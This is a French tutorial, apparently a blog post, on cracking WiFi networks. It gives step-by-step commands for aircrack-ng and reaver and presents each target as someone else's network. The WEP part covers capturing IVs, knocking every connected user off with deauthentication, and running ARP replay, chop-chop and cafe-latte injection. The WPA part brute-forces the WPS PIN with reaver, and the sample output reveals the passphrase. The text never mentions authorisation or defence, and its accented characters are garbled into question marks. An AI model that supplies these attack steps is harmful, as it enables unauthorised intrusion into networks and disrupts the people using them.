Pr?-requis :
Avoir une distribution Debian ou Ubuntu. Ces distributions ne sont pas meilleures pour le crack que les autres, mais mon tutoriel est bas? uniquement sur cette distribution.
Les commandes fonctionnent parfaitement sur d?autres distributions. La seule diff?rence, est la mani?re d?installer les d?pendances.
Droits d?acc?s
Pour la grande majorit? des commandes, vous devez ?tre ROOT pour que cela fonctionne.
Vous pouvez le devenir en tapant la commande ? su ? ? et en entrant le mot de passe de ? root ?
Installer la suite aircrack-ng (et ses d?pendances)
apt-get install libssl-dev make gcc iw wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz tar -zxvf aircrack-ng-1.1.tar.gz cd aircrack-ng-1.1 make make install
Avoir une carte wifi compatible (Realtek, RALink,…) Evitez les cartes Intel…
Tapez la commande ?iwconfig? et regardez le mat?riel Wifi install?.
root@linux-hack:~# iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan0 IEEE 802.11bg ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=27 dBm Retry long limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off pan0 no wireless extensions.
Dans ce cas-ci, on voit que l?interface r?seau WLAN0 est une carte WIFI.
Comment v?rifier si elle est capable de passer en mode ? monitor ?
root@linux-hack:~# airmon-ng start wlan0 Found 5 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! -e PID Name 1211 NetworkManager 1220 avahi-daemon 1223 avahi-daemon 2298 wpa_supplicant 2300 dhclient Interface Chipset Driver wlan0 RTL8187 rtl8187 - [phy0] (monitor mode enabled on mon0)
Nous voyons que la carte WLAN0 est pass?e en mode monitor via la nouvelle interface r?seau ? MON0 ?
Scannez les r?seaux Wifi environnants pour trouver votre cible
airodump-ng mon0
Cette commande va vous donner la liste de tout ce qu?il trouve
CH 5 ][ Elapsed: 24 s ][ 2012-02-14 09:32 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 11:22:33:44:55:66 -36 39 30 0 9 54e. WPA TKIP PSK bbox2-1234 11:22:33:44:55:66 -35 41 0 0 9 54e. OPN bbox2-1234 11:22:33:44:55:66 -49 19 1 0 1 54e. OPN bbox2-1234 11:22:33:44:55:66 -66 14 0 0 6 54e WPA2 CCMP PSK bbox2-1234 11:22:33:44:55:66 -65 15 1 0 6 54e. WPA2 CCMP PSK bbox2-1234 11:22:33:44:55:66 -67 7 0 0 1 54e. OPN bbox2-1234 11:22:33:44:55:66 -67 19 0 0 9 54 . WEP WEP bbox2-1234 11:22:33:44:55:66 -68 5 1 0 1 54e. WPA TKIP PSK bbox2-1234 11:22:33:44:55:66 -70 4 0 0 1 54e WPA2 CCMP PSK bbox2-1234 11:22:33:44:55:66 -71 4 0 0 11 54e. WPA TKIP PSK bbox2-1234 11:22:33:44:55:66 -72 2 0 0 1 54e. WEP WEP bbox2-1234 BSSID STATION PWR Rate Lost Packets Probes (not associated) 11:22:33:44:55:66 -72 0 - 1 0 2 bbox2-9999 11:22:33:44:55:66 11:22:33:44:55:66 -9 54e-54 0 4 11:22:33:44:55:66 11:22:33:44:55:66 -56 1e- 5 0 2
BSSID = adresse MAC de l’appareil
ESSID = nom d WIFI
STATION = Adresse MAC d’un appareil wifi connect? (pc, GSM, …)
PWR = perte de signal entre vous et la station (-40 = bien. -70 = mauvais signal)
CH = canal de communication (fr?quence)
ENC = Cryptage mis en place.
J?ai volontairement masqu? les adresses MAC et les noms des WIFI pour des raisons de s?curit?
Cracker le mot de passe d?un r?seau Wifi
Cracker un reseau OPN
Y’a pas besoin, il n’y a aucun cryptage
Cracker un r?seau WEP
Dans la suite, je vous pr?senterai plusieurs commandes. Celles-ci sont a lancer en simultan?. Ouvrez donc une fen?tre de terminal diff?rente ? chaque attaque/commande
1? Lancer airodump en mode « enregistrement des donn?es » sur la cible.
Voici les d?tails de ma cible :
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 11:22:33:44:55:66 -68 5 0 0 1 54e. WEP WEP bbox2-1234
airodump-ng -w BIBOX --ivs -c 1 -d 11:22:33:44:55:66 mon0
Cette commande demande :
– D’?crire dans un fichier commen?ant par BIBOX
– N’?crire que les donn?es utiles pour le crack (les IVS)
– De se caler sur le canal 1 (-c 1)
– De ne filtrer que sur l’Access Point qui nous int?resse sur base de son adresse MAC (-d MAC )
– Le tout, via l’interface r?seau « mon0 »
Cette commande ne devra ?tre arr?t?e QUE quand on aura finalement crack? l’AccessPoint.
2? Ejecter tous les gens connect?s dessus afin de les forcer ? se reconnecter.
aireplay-ng -0 0 -a 11:22:33:44:55:66 mon0
-0 0 : attaque 0 ex?cut?e ind?finiment (0)
-a MAC : adresse mac de la machine que j’attaque
Arr?ter la commande apr?s un certain temps. Vous pourrez la relancer plusieurs fois si vous voulez, mais n?oubliez pas de vous r?-authentifier apr?s (point suivant)
3? S’authentifier sur le WIFI (faire croire qu’on est copains)
aireplay-ng -1 0 -e 11:22:33:44:55:66 mon0
-1 0 : attaque 1 ex?cut?e sans arr?t (0)
-e MAC : adresse mac de la machine que j’attaque
4? Faire une attaque ? ARP ?
aireplay-ng -3 -e 11:22:33:44:55:66 mon0
Cette attaque est TRES ?fficace quand quelqu?un est d?j? connect? sur le wifi.
Il vaut mieux la laisser tourner. D?s qu?elle d?marre, elle est redoutable !
5? Faire une attaque ? chop-chop ?
aireplay-ng -4 -e 11:22:33:44:55:66 mon0
6? Faire une attaque ? cofee-latte ?
aireplay-ng -6 -e 11:22:33:44:55:66 mon0
Cette attaque est efficace si quelqu?un est d?j? connect? sur le WIFI
7? cracker la clef.
C?est bien beau de sauver les IVS, de faire des attaques, de g?n?rer du traffic et tout et tout, mais on voulait quoi d?j? ? Ah oui ! cette foutue clef !
aircrack-ng *.ivs
Laissez tourner?
D?s que la clef sera trouv?e, vous pourrez arr?ter toutes les attaques ci-dessus.
Cracker du WPA
Pr?-requis :
Installer les programmes n?cessaires ainsi que leurs d?pendances
apt-get install libsqlite3-dev libpcap0.8-dev wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz tar -zxf reaver-1.4.tar.gz cd reaver-1.4 cd src ./configure make make install
Connaitre sa cible.
Voir point ci-dessus : Scannez les r?seaux Wifi environnants pour trouver votre cible
Attaquer le point WIFI
reaver -i mon0 -b 11:22:33:44:55:66
ou, si ca ne fonctionne pas (comme chez moi)
reaver -L -d 0 -i mon0 -b 11:22:33:44:55:66
La syntaxe est simple : lancer reaver sur l?interface wifi qui-va-bien avec comme param?tre l?adresse MAC du wifi cible (BSSID) (vous pouvez ajouter l?option ? ?vv ? pour le voir travailler)
Le r?sultat apparait comme par enchantement !
root@linux-hack:~# reaver -L -d 0 -i mon0 -b 11:22:33:44:55:66 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [+] Waiting for beacon from 11:22:33:44:55:66[+] Switching mon0 to channel 1 [+] Associated with 11:22:33:44:55:66 (ESSID: bbox2-1234) [+] Trying pin 12345670 [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received M5 message [+] Sending M6 message [+] Received M7 message [+] Sending WSC NACK [+] Sending WSC NACK [+] Pin cracked in 12 seconds [+] WPS PIN: '12345670' [+] WPA PSK: 'Ceciestuntutoriel' [+] AP SSID: 'bbox2-1234' [+] Nothing done, nothing to save. root@linux-hack:~#
Et voil?. 12 secondes pour du WPA. Le mot de passe apparait : ‘Ceciestuntutoriel’
Si vous voulez connaitre le vendeur d’une carte r?seau : http://www.base64online.com/mac_address.php